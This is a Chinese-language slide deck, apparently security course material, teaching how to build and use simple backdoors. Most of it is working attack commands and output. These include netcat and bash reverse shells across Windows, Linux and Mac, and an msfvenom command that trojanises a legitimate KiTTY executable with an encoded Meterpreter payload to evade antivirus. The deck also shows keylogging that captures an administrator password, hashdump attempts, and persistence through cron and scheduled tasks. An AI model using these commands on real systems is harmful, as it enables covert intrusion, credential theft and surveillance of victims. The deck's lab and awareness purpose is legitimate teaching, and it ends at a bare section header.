<!doctype html>
<html lang="en">

<head>
	<meta charset="utf-8">

	<title>Markdown slide</title>

	<meta name="description" content="A framework for easily creating beautiful presentations using HTML">
	<meta name="author" content="Hakim El Hattab">

	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">

	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<link rel="stylesheet" href="libs/reveal.js/4.1.3/reset.css">
	<link rel="stylesheet" href="libs/reveal.js/4.1.3/reveal.css">

	
	
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

	  <!-- highlight Theme -->
  	
	  <link rel="stylesheet" href="libs/highlight.js/11.3.1/styles/monokai.min.css">
	
	
		
	<link rel="stylesheet" href="libs/reveal.js/4.1.3/plugin/chalkboard/style.css">
	
	
	
		<link rel="stylesheet" href="libs/reveal.js/4.1.3/plugin/customcontrols/style.css">
	
	<link rel="stylesheet" href="libs/styles/tasklist.css">



  <!-- Revealjs Theme -->
  
  	<link rel="stylesheet" href="libs/reveal.js/4.1.3/theme/beige.css" id="theme">
  
  


  <!-- Revealjs Theme -->
  

 
</head>

<body>
  


  <div class="reveal">

    <!-- Any section element inside of this container is displayed as a slide -->
    <div class="slides">

      


    
        <section >
            
            <style type="text/css">
    p { text-align: left; }
    h2 { text-align: left; }
</style>
<h1>MAL_简单后门</h1>
<pre><code>学习内容：使用nc实现win，mac,Linux间的后门连接
		：meterpreter的应用
		：MSF POST 模块的应用
学习目标：建立一个后门连接是如此的简单，功能又如此强大。通过亲手实践并了解这一事实，从而提高自己的安全意识 。
最后编辑：20180221 Wildlinux

</code></pre>

            </section>
    



    
    <section>
        <section >
            <h2>1.后门概念</h2>
<p>后门就是不经过正常认证流程而访问系统的通道。</p>
<p>哪里有后门呢？</p>
<ul>
<li>编译器留后门</li>
<li>操作系统留后门</li>
<li>最常见的当然还是应用程序中留后门</li>
<li>还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。</li>
</ul>

            </section>
        
            <section >
                <p>下面是近些年的一些例子：</p>
<ol>
<li><a href="http://baike.baidu.com/link?url=Wv-8zzRwTGZ_61387Med9WY8hv3zCx9iN5QuBkSvQ-ZDLvGlilqc3GD3tZFwTYXdilfHLctosG1IRv4rDOGHv-xzsW8ILC23ZXLeaQshp8UKwc-7KauCDAAOiCGwj9o0uxfxA0ybDTVAdmuGx3lzO6Vgx1SzzYy3dxyNDydd38m">编译器：苹果Xcode后门事件</a>。苹果Xcode后门事件中招的APP包括：微信、网易云音乐、滴滴出行、12306等76个软件，影响到几亿用户。</li>
<li><a href="http://digi.tech.qq.com/a/20160303/010802.htm">操作系统：政府VS厂商</a>。苹果公开拒绝FBI要求设置后门的要求。那些没拒绝的当然不会说话。</li>
<li><a href="http://www.freebuf.com/vuls/56081.html">操作系统：深入解读MS14-068漏洞：微软精心策划的后门？</a>。其实细节我也没太看懂，看出来蛮可疑。</li>
<li><a href="http://www.freebuf.com/news/78730.html">固件：更多思科路由器发现后门：中国有4台</a></li>
<li><a href="http://www.freebuf.com/news/122985.html">应用：研究人员发现macOS版Skype内置了后门</a></li>
<li><a href="http://industry.caijing.com.cn/20161123/4202726.shtml">应用：从广升“后门”事件看企业道德底线</a></li>
<li><a href="https://www.zhihu.com/question/36959112">应用：如何评价乌云漏洞平台曝百度旗下多款App存在WormHole后门？</a></li>
</ol>

            </section>
        
            <section >
                <p>我们接下来讲得是一个相对狭义一点的后门的概念，</p>
<ul>
<li>特指潜伏于操作系统中专门做后门的一个程序，</li>
<li>“坏人”可以连接这个程序</li>
<li>远程执行各种指令。</li>
<li>概念和木马有重叠</li>
</ul>

            </section>
        
            <section >
                <pre><code>
* 首先得有这么一个程序
	* netcat 系列
	* meterpreter
	* intersect 
	* ...特别多
* 其次得放到系统里 
	* 正版软件故意或被攻击，包含后门
	* 正版库文件中包含后门
	* 本质上，需要诱骗你下载操作的，都属于各种钓鱼吧	 
		* 安装包中包含后门，放到网上供下载
		* 绑定到特定文件中，放到网上供下载
		* 直接发送恶意程序给你
		* 直接发送攻击性钓鱼链接给你，恶意网站种马
		* 捡到个U盘，打开个文件看看？
	* 煤女帅锅拿U盘直接拷给你
	* 攻击系统漏洞，获取控制权后，安装后门	
* 再次还得运行起来
	* 开机自启动技术
	* win的定时任务
	* linux的cron
	* 伪装成常用软件，诱使用户点击
	* 木马化正常软件
* 最后还得不被本机的恶意代码检测程序发现
	* 恶意代码免杀技术 
* 也不能被本机的或网络上的防火墙发现
	* 反弹式连接
	* 加密连接
	* 隧道技术

</code></pre>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h2>2. 常用后门工具</h2>
<ul>
<li>2.1 讲怎么用nc获取远程主机的Shell</li>
<li>2.2 讲meterpreter怎么用。</li>
</ul>

            </section>
        
            <section >
                <h3>2.1 NC 或 netcat</h3>
<p>1.关于netcat</p>
<ul>
<li>又名nc,ncat</li>
<li><a href="http://nc110.sourceforge.net/">http://nc110.sourceforge.net/</a></li>
<li><a href="http://netcat.sourceforge.net/">http://netcat.sourceforge.net/</a>.</li>
</ul>
<p>是一个底层工具，进行基本的TCP UDP数据收发。常被与其他工具结合使用，起到后门的作用。</p>

            </section>
        
            <section >
                <ul>
<li>Linux: 一般自带netcat,“man netcat” 或&quot;man nc&quot;可查看其使用说明。</li>
<li>Windows: 课程主页<a href="http://git.oschina.net/wildlinux/NetSec/attach_files">附件</a>中下载ncat.rar解压即可使用。</li>
<li>Mac:  系统自带，“man nc”,查看其使用说明。</li>
<li>以下相关指令，实测有效。</li>
</ul>

            </section>
        
            <section >
                <h4>2.1.1 Win获得Linux Shell</h4>
<p>以下实践Windows基本Win7-64bit, Kali2-64bit.</p>
<p>1.windows 打开监听</p>
<pre><code>c:\your_nc_dir&gt;ncat.exe -l -p 8888
</code></pre>
<p>2.Linux反弹连接win</p>
<pre><code class="language-bash">root@KaliYL:/var/www/html# nc 192.168.20.175 8888 -e /bin/sh
</code></pre>
<p>3.windows下获得一个linux shell，可运行任何指令，如ls</p>
<pre><code>c:\your_nc_dir&gt;ncat.exe -l -p 8888  #这条指令是第一步中输入的，不用再输
ls
</code></pre>

            </section>
        
            <section >
                <h4>2.1.2 Linux获得Win Shell</h4>
<p>1.Linux运行监听指令</p>
<pre><code class="language-bash">root@KaliYL:/var/www/html# nc -l -p 8888
</code></pre>
<p>2.Windows反弹连接Linux</p>
<pre><code> c:\your_nc_dir&gt;ncat.exe -e cmd.exe ip_of_linux 8888
</code></pre>
<p>3.Linux下看到Windows的命令提示</p>
<pre><code>
root@KaliYL:/var/www/html# nc -l -p 8888 

 Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

 C:\Users\YLWin\Desktop\ncat&gt;
 
</code></pre>

            </section>
        
            <section >
                <h4>2.1.3 Mac获取Win shell</h4>
<pre><code>
Mac: nc -l 8888

Win: c:\your_nc_dir&gt;ncat.exe -e cmd.exe ip_of_mac 8888

</code></pre>
<ul>
<li>Mac系统可以通过“-k”参数，实现连接关闭后自动重新侦听。</li>
<li>Mac系统下的nc不支持 “-e” 参数</li>
</ul>

            </section>
        
            <section >
                <h4>2.1.4 Win获取Mac Shell</h4>
<p>1.Windows下启动监听</p>
<pre><code>Win: C:\Users\YLWin\Desktop\ncat&gt;ncat.exe -l -p 8888
</code></pre>
<p>2.Mac下连接Win</p>
<pre><code>bash -i &gt;&amp; /dev/tcp/ip_of_win/8888 0&gt;&amp;1
</code></pre>
<p>3.Win获得Mac的shell</p>
<pre><code>C:\Users\YLWin\Desktop\ncat&gt;ncat.exe -l -p 8888
[?1034hbash-3.2$ uname -a
Darwin localhost 14.5.0 Darwin Kernel Version 14.5.0: Mon Aug 29 21:14:16 PDT 2016; root:xnu-2782.50.6~1/RELEASE_X86_64 x86_64
bash-3.2$
bash-3.2$
bash-3.2$ exit
</code></pre>

            </section>
        
            <section >
                <h4>2.1.5 Mac获取Linux Shell</h4>
<p>1.主控端/服务端MAC运行指令如下,8888是nc监听的端口号。</p>
<pre><code>MacBook-Pro:$ nc -l 8888 

</code></pre>
<p>2.受控端/客户机运行指令如下。其中 192.168.1.106 需要更改为上一步中MAC主机的IP。8888就是上一步中的端口号</p>
<pre><code>root@KaliYL:/var/www/html# bash -i &gt;&amp; /dev/tcp/192.168.1.106/8888 0&gt;&amp;1

</code></pre>
<p>nc IP Port -e /bin/sh 可以达到同样的效果</p>
<p>3.MAC主机会显示Linux的命令行提示符，并运行任何Linux指令。</p>
<pre><code>MacBook-Pro:$ nc -l 8888 
root@KaliYL:/var/www/html# uname -a
uname -a
Linux KaliYL 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux

</code></pre>

            </section>
        
            <section >
                <p>####2.1.6 Linux获取Mac Shell</p>
<p>1.Linux启动监听</p>
<pre><code>root@KaliYL:~# ifconfig
eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500
        inet 192.168.20.154  netmask 255.255.255.0  broadcast 192.168.20.255
       
root@KaliYL:/var/www/html# nc -l -p 8888
</code></pre>
<p>2.Mac连接Linux</p>
<pre><code>localhost:~ $ bash -i &gt;&amp; /dev/tcp/192.168.20.154/8888 0&gt;&amp;1
</code></pre>
<p>3.Linux获取Mac Shell</p>
<pre><code>root@KaliYL:/var/www/html# nc -l -p 8888
bash-3.2$ 
bash-3.2$ uname -a
Darwin localhost 14.5.0 Darwin Kernel Version 14.5.0: Mon Aug 29 21:14:16 PDT 2016; root:xnu-2782.50.6~1/RELEASE_X86_64 x86_64
</code></pre>

            </section>
        
            <section >
                <h4>2.1.7 Netcat扩展知识</h4>

            </section>
        
            <section >
                <h5>2.1.7.1 nc传输数据</h5>
<p>Start by using nc to listen on a specific port, with output captured into a file:</p>
<pre><code>$ nc -l 1234 &gt; filename.out
</code></pre>
<p>Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:</p>
<pre><code>$ nc host.example.com 1234 &lt; filename.in
</code></pre>
<p>After the file has been transferred, the connection will close automatically.</p>

            </section>
        
            <section >
                <h5>2.1.7.2 SoCat</h5>
<p>Netcat++,超级netcat工具。</p>
<p>不信？自己看<a href="http://www.dest-unreach.org/socat/doc/README">README</a>。</p>
<p>windows版见<a href="http://git.oschina.net/wildlinux/NetSec/attach_files">附件</a>。解压即用，不用安装。</p>
<p>任何代理、转发等功能都可以用该工具实现。</p>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h3>2.2 Meterpreter</h3>
<pre><code>测试环境: Kali2-2016.1 最后修改: 2016.08.28 wildlinux
</code></pre>
<ul>
<li>后门就是一个程序。</li>
<li>传统的理解是：有人编写一个后门程序，大家拿来用。</li>
<li>后来有一些牛人呢，就想编写一个平台能生成后门程序。这个平台呢，把后门的
<ul>
<li><code>基本功能（基本的连接、执行指令）</code>，</li>
<li><code>扩展功能（如搜集用户信息、安装服务等功能）</code>，</li>
<li><code>编码模式</code>，</li>
<li><code>运行平台</code>，</li>
<li>以及<code>运行参数</code></li>
</ul>
</li>
<li>全都做成零件或可调整的参数。用的时候按需要组合，就可以生成一个可执行文件。</li>
</ul>

            </section>
        
            <section >
                <p>典型的平台就包括有：</p>
<ul>
<li><a href="http://tools.kali.org/maintaining-access/intersect">intersect</a></li>
<li>Metaspolit的msfvenom指令</li>
<li><a href="https://www.veil-framework.com/framework/veil-evasion/">Veil-evasion</a></li>
</ul>

            </section>
        
            <section >
                <p>我们接下来学习如何使用msfenom生成后门可执行文件。我们要生成的这个后门程序是Meterpreter.</p>
<p><a href="http://www.freebuf.com/articles/system/53818.html">揭开Meterpreter的神秘面纱</a>介绍了meterpreter的一些底层原理。</p>

            </section>
        
            <section >
                <h4>2.2.1 生成的KiTTy_backdoor.exe，复制到Win</h4>
<p>下面指令中用到的 ./KiTTYPortable.exe 是一个普通的windows可执行文件，被我复制了/home/YL/目录下，后门会被写到这个文件中。我做实验时用的是KiTTYPortable.exe，你可以用其他文件代替。不论用哪个可执行文件都可以，但当然需要复制到linux下了。</p>
<pre><code>root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe &gt; KiTTy_backdoor.exe

*** 或者简单点 ***
root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe &gt; meter_backdoor.exe

</code></pre>

            </section>
        
            <section >
                <p>参数说明：</p>
<pre><code>-p 使用的payload。payload翻译为有效载荷，就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
-x 使用的可执行文件模板，payload(shellcode)就写入到这个可执行文件中。
-e 使用的编码器，用于对shellcode变形，为了免杀。
-i 编码器的迭代次数。如上即使用该编码器编码5次。
-b badchar是payload中需要去除的字符。
LHOST 是反弹回连的IP
LPORT 是回连的端口
-f 生成文件的类型
&gt; 输出到哪个文件
</code></pre>
<ul>
<li>生成的文件当然需要复制到windows中了，当然十之八九杀毒软件会报警并删除该文件，因为是后门吗。所以为了验证共功能，可以临时关闭一会杀毒软件。后面我们会讲到免杀，免杀完的后门杀毒软件就不会被发现了。</li>
</ul>

            </section>
        
            <section >
                <h4>2.2.2 MSF打开监听进程</h4>
<p>在Linux如下操作至 ‘exploit’一步；</p>
<pre><code>root@KaliYL:/home/YL# msfconsole

msf &gt; use exploit/multi/handler
msf exploit(handler) &gt; set payload windows/meterpreter/reverse_tcp
payload =&gt; windows/meterpreter/reverse_tcp
msf exploit(handler) &gt; show options
Module options (exploit/multi/handler):

Name  Current Setting  Required  Description
 ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     443              yes       The listen port
msf exploit(handler) &gt; set LHOST 192.168.20.136
LHOST =&gt; 192.168.20.136
msf exploit(handler) &gt; exploit 

[*] Started reverse TCP handler on 192.168.20.136:443 
[*] Starting the payload handler...
</code></pre>
<p><strong>说明：</strong></p>
<ol>
<li>LHOST需要和上一步生成backdoor.exe的一致，本例中即192.168.20.136；</li>
<li>LPORT也需要和上一步生成backdoor.exe的一致，即443；</li>
<li>payload也要一致，即windows/meterpreter/reverse_tcp。</li>
</ol>

            </section>
        
            <section >
                <h4>2.2.3 在Win平台双击运行KiTTy_backdoor.exe。</h4>
<p>Linux平台的监听进程将获得Win主机的主动连接，并得到远程控制shell:</p>
<pre><code>[*] Sending stage (957999 bytes) to 192.168.20.176
[*] Meterpreter session 1 opened (192.168.20.136:443 -&gt; 192.168.20.176:50169) at 2016-08-28 21:38:22 +0800

meterpreter &gt; 
meterpreter &gt; dir
Listing Z:\yudong\PortableApps\KiTTYPortable
*=============================================*

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   170     dir   2014-08-21 18:13:08 +0800  App
40777/rwxrwxrwx   374     dir   2016-08-12 00:33:48 +0800  Data
100777/rwxrwxrwx  173040  fil   2014-06-26 06:52:12 +0800  KiTTYPortable.exe
100777/rwxrwxrwx  173040  fil   2016-08-28 21:26:40 +0800  KiTTy_backdoor.exe
40777/rwxrwxrwx   136     dir   2014-08-21 18:13:13 +0800  Other
100666/rw-rw-rw-  5347    fil   2012-06-28 09:11:58 +0800  help.html
</code></pre>

            </section>
        
            <section >
                <h4>2.2.4 Meterpreter常用功能</h4>

            </section>
        
            <section >
                <h5>2.2.4.1 基本功能</h5>
<p>1.help 当然是我心中的最佳人气奖不二人选。help一输一身轻松，妈妈再也不担心我忘记指令了。当然是全E文。中文都是我输的。</p>
<pre><code class="language-bash">meterpreter &gt; help
Core Commands第一部分是核心指令
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for 'load'
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands第二部分是文件系统相关的
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands当然少不了网络操作的了
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands系统指令
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands用户接口，哇还可以抓取击键记录呢
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands 什么?Video?昨天哪位同学问我来着？测试Win7可拍摄。
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Priv: Elevate Commands提权
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.
    ***我的win7没成功***

Priv: Password database Commands导出密码文件SAM
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database
    ***我的win7没成功***

Priv: Timestomp Commands修改文件操作时间，清理现场用
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

这么多好玩的指令，都想试试呢，简直停不下来。

</code></pre>

            </section>
        
            <section >
                <p>2.获取Windows命令行界面，以方便执行Windows内置功能指令,exit退出。</p>
<pre><code class="language-bash">meterpreter &gt; shell
Process 8984 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Users\YLWin\Desktop&gt;exit
exit
meterpreter &gt; 

</code></pre>

            </section>
        
            <section >
                <p>3.获取ruby交互界面，exit退出。如果你行，甚至可以用ruby直接编程（PS：我不会,所以就不多说了）。具说可以调用windows任何API。可参考《Metasploit魔鬼训练营》第九章，有一个小例子。</p>
<pre><code class="language-bash">meterpreter &gt; irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
&gt;&gt; client.sys.config.sysinfo()
=&gt; {&quot;Computer&quot;=&gt;&quot;YLWIN-PC&quot;, &quot;OS&quot;=&gt;&quot;Windows 7 (Build 7600).&quot;, &quot;Architecture&quot;=&gt;&quot;x64 (Current Process is WOW64)&quot;, &quot;System Language&quot;=&gt;&quot;zh_CN&quot;, &quot;Domain&quot;=&gt;&quot;WORKGROUP&quot;, &quot;Logged On Users&quot;=&gt;3}
&gt;&gt;exit
meterpreter &gt;

</code></pre>

            </section>
        
            <section >
                <p>4.玩个进程和和迁移吧，把meterpreter HOOK到其他进程上，这样就不用怕用户把当前这个进程关闭了。</p>
<pre><code class="language-bash">
meterpreter &gt; ps

Process List
============

 PID   PPID  Name                          Arch  Session  User            Path
 ---   ----  ----                          ----  -------  ----            ----
 0     0     [System Process] 
 ...会有好多进程，我就略过了...  
 4312  9376  iexplore.exe                  x86   1        YLWin-PC\YLWin  C:\Program Files (x86)\Internet Explorer\iexplore.exe 发现IE，就迁移到它吧。

meterpreter &gt; migrate 4312
[*] Migrating from 8656 to 4312...
[*] Migration completed successfully.
meterpreter &gt; getpid
Current pid: 4312  耶，成功！
meterpreter &gt; 

*** PS: 在windows下，以管理员权限运行&quot;命令行&quot;，输入&quot;netstat -bn&quot;，可以查看是哪个exe在连接meterpreter ***

</code></pre>

            </section>
        
            <section >
                <p>5.抓个图，偷个登陆密码啥的吧</p>
<pre><code class="language-bash">meterpreter &gt; screenshot
Screenshot saved to: /usr/share/intersect/Scripts/rWjouIAU.jpeg

*** 打开jpeg看看，能发现什么 ***

meterpreter &gt; ps

Process list
=================

PID Name         Path
--- ----         ----
401 winlogon.exe C:\WINNT\system32\winlogon.exe

meterpreter &gt; migrate 401

[*] Migrating to 401...
[*] Migration completed successfully.

meterpreter &gt; keyscan_start
Starting the keystroke sniffer...

**** 过了一会，隔壁的管理员来了，很自然登陆了系统看看... ****

meterpreter &gt; keyscan_dump
Dumping captured keystrokes...
Administrator ohnoes1vebeenh4x0red!

*** 想窃听哪个进程，得先迁移过去哦 ***

</code></pre>

            </section>
        
            <section >
                <h5>2.2.4.2 后渗透攻击模块POST</h5>
<p>MSF自带非常多的POST模块，这些模块都可以在meterpreter下使用。所谓POST模块，也就是在获得系统初步控制权后可能用到的攻击模块。</p>
<pre><code class="language-bash">***  针对Windows的POST模块主要有以下一些，这些既是目录名，其实也相当于是POST模块的类型 ***
root@KaliYL:/usr/share/metasploit-framework/modules/post/windows# ls
capture  escalate  gather  manage  recon  wlan
***信息抓取 提权 信息搜集 管理 recon 无线 ***

</code></pre>

            </section>
        
            <section >
                <p>POST使用很简单，在获取meterpreter会话后，会两条基本指令：info 查看POST的说明，run 运行POST，即可。具体有哪些POST可用，可以进到上面那些目录中看。</p>
<pre><code>*** 这个POST是用来检查被控机是否是虚拟机 ***
meterpreter &gt; info post/windows/gather/checkvm 

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module attempts to determine whether the system is running 
  inside of a virtual environment and if so, which one. This module 
  supports detectoin of Hyper-V, VMWare, Virtual PC, VirtualBox, Xen, 
  and QEMU.

*** run ***
meterpreter &gt; run post/windows/gather/checkvm 

[*] Checking if YLWIN-PC is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter &gt; 

***试着导出密码呢！提示需要SYSTEM权限才可以！建议是migrate到一个服务进程试试！试了几个迁移失败。***
meterpreter &gt; run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY e791bff46194c82f87e08b89c249535b...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

***试试键盘记录***
meterpreter &gt; run post/windows/capture/keylog_recorder 

[*] Executing module against YLWIN-PC
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20161026094348_default_192.168.20.145_host.windows.key_150214.txt
[*] Recording keystrokes...
***CTL+C 结束记录***
^C[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
meterpreter &gt; 

***都在这个文件中了：/root/.msf4/loot/20161026094348_default_192.168.20.145_host.windows.key_150214.txt
***

</code></pre>

            </section>
        
            <section >
                <h5>2.2.4.3 安装Meterpreter(Persistence)到目标机</h5>
<p>两种方式《Metasploit魔鬼训练营》411页有。</p>
<p>1.run persistence</p>
<pre><code>*** 一定学会看帮助 ***
meterpreter &gt; run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L &lt;opt&gt;  Location in target host to write payload to, if none %TEMP% will be used.
    -P &lt;opt&gt;  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T &lt;opt&gt;  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i &lt;opt&gt;  The interval in seconds between each connection attempt
    -p &lt;opt&gt;  The port on which the system running Metasploit is listening
    -r &lt;opt&gt;  The IP of the system running Metasploit listening for the connect back

***试试，不成功，因为最后没有成功的输出 ***
meterpreter &gt; run persistence -U -i 5 -p 443 -r 192.168.20.136 
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/YLWIN-PC_20161026.0846/YLWIN-PC_20161026.0846.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.20.136 LPORT=443
[*] Persistent agent script is 99614 bytes long
meterpreter &gt; 


</code></pre>

            </section>
        
            <section >
                <p>2.run metsvc</p>
<pre><code>***不成功，可能原因是：当前进程没有SYSTEM权限。归结到一个问题：如何提权？***
meterpreter &gt; run metsvc
[*] Creating a meterpreter service on port 31337
meterpreter &gt; 

</code></pre>

            </section>
        
            <section >
                <p>3.其他</p>
<p>对于我们这种场景就简单了，应用已经在系统时了，让它自启动就可以了。加计划任务，或手工修改注册表的可以。</p>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h2>3 后门启动</h2>

            </section>
        
            <section >
                <h3>3.1 Windows</h3>
<h4>3.1.1 Windows-&gt;控制面板-&gt;管理工具-&gt;任务计划程序</h4>
<p>新建任务计划</p>
<p>触发器</p>
<pre><code>当锁定任何用户的工作站时
</code></pre>
<p>操作-&gt;程序或脚本</p>
<pre><code>c:\Users\YLWin\Desktop\ncat\ncat.exe
</code></pre>
<p>操作-&gt;添加参数：</p>
<pre><code>-e cmd.exe 192.168.1.105 8080
</code></pre>
<p>在主控机192.168.1.105:8080上打开nc，每当受控机用户锁定时，都会连接到192.168.1.105:8080.实测有效。</p>

            </section>
        
            <section >
                <h4>3.1.2 开机启动</h4>
<h4>3.1.3 安装为服务</h4>
<h4>3.1.4 和其他文件捆绑</h4>

            </section>
        
            <section >
                <h4>3.1.5 powershell</h4>
<p>powershell是微软的增强shell，在现在发行的Windows(如Win7)都内置了。你可以在&quot;运行&quot;中输入&quot;powershell&quot;,就会得到一个和cmd.exe窗口看起来一样的东东。不过它支持几乎所有的Windows操作。凡是图形界面可以做的，powershell下都可以做。也支持脚本编程。</p>
<p>一个副作用就是，powershell脚本写成恶意代码，杀毒软件几乎检测不出来（可能是用的少，杀毒软件不检测）。</p>
<p>powershell下也有类似netcat的powercat。可以做后门。</p>

            </section>
        
            <section >
                <h3>3.2 Linux</h3>
<h4>3.2.1 cron</h4>
<p>Cron是Linux下的定时任务，每一分钟运行一次，根据配置文件执行预设的指令。详细说明可以&quot;man cron&quot;。</p>

            </section>
        
            <section >
                <p>1.crontab指令增加一条定时任务，&quot;-e&quot;表示编辑。</p>
<pre><code class="language-bash">root@KaliYL# crontab -e
no crontab for root - using an empty one

Select an editor.  To change later, run 'select-editor'.
  1. /bin/nano        &lt;---- easiest
  2. /usr/bin/mcedit
  3. /usr/bin/vim.basic
  4. /usr/bin/vim.gtk
  5. /usr/bin/vim.tiny
</code></pre>

            </section>
        
            <section >
                <p>2.因为是第一次编辑，故提示选择编辑器，我选择了3，并添加了最后一行。简单说就是在每个小时的第43分钟执行后面的那条指令。</p>
<pre><code>Choose 1-5 [1]: 3
crontab: installing new crontab
# m分钟 h小时  dom日期 mon月 dow周几   command执行的命令
43 * * * * /bin/netcat 192.168.1.105 8090 -e /bin/sh
</code></pre>

            </section>
        
            <section >
                <p>3.保存、退出后配置即生效。可以通过&quot;crontab -l&quot;来查看，&quot;-l&quot;表示list。</p>
<pre><code class="language-bash">root@KaliYL# crontab -l
43 * * * * /bin/netcat 192.168.1.105 8090 -e /bin/sh
</code></pre>

            </section>
        
            <section >
                <p>4.每个小时到了43分，上面的那条指令就会执行。</p>
<p>5.如果你在另一台主机192.168.1.105让nc侦听在8090端口，那到了43分就会有获得一个shell。实测有效。这就是一个最简单的反弹式后门。你也可以开一个非反弹式的后门，如把cron指令写成&quot;nc -l -p 8087 -e /bin/sh&quot;,你的主控机可以随时连接这个主机&quot;nc IP 8087&quot;，就能获得shell。</p>

            </section>
        
            <section >
                <h4>3.2.2 各种启动脚本</h4>
<p><a href="https://blog.csdn.net/finzale/article/details/45421713">Linux启动中的运行的脚本</a></p>
<h4>3.2.3 和其他文件捆绑</h4>
<p><a href="http://www.cnblogs.com/5314zkj/p/6886500.html">上届免考</a></p>

            </section>
        

    </section>
    



    
        <section >
            
            <h2>4 隧道技术</h2>
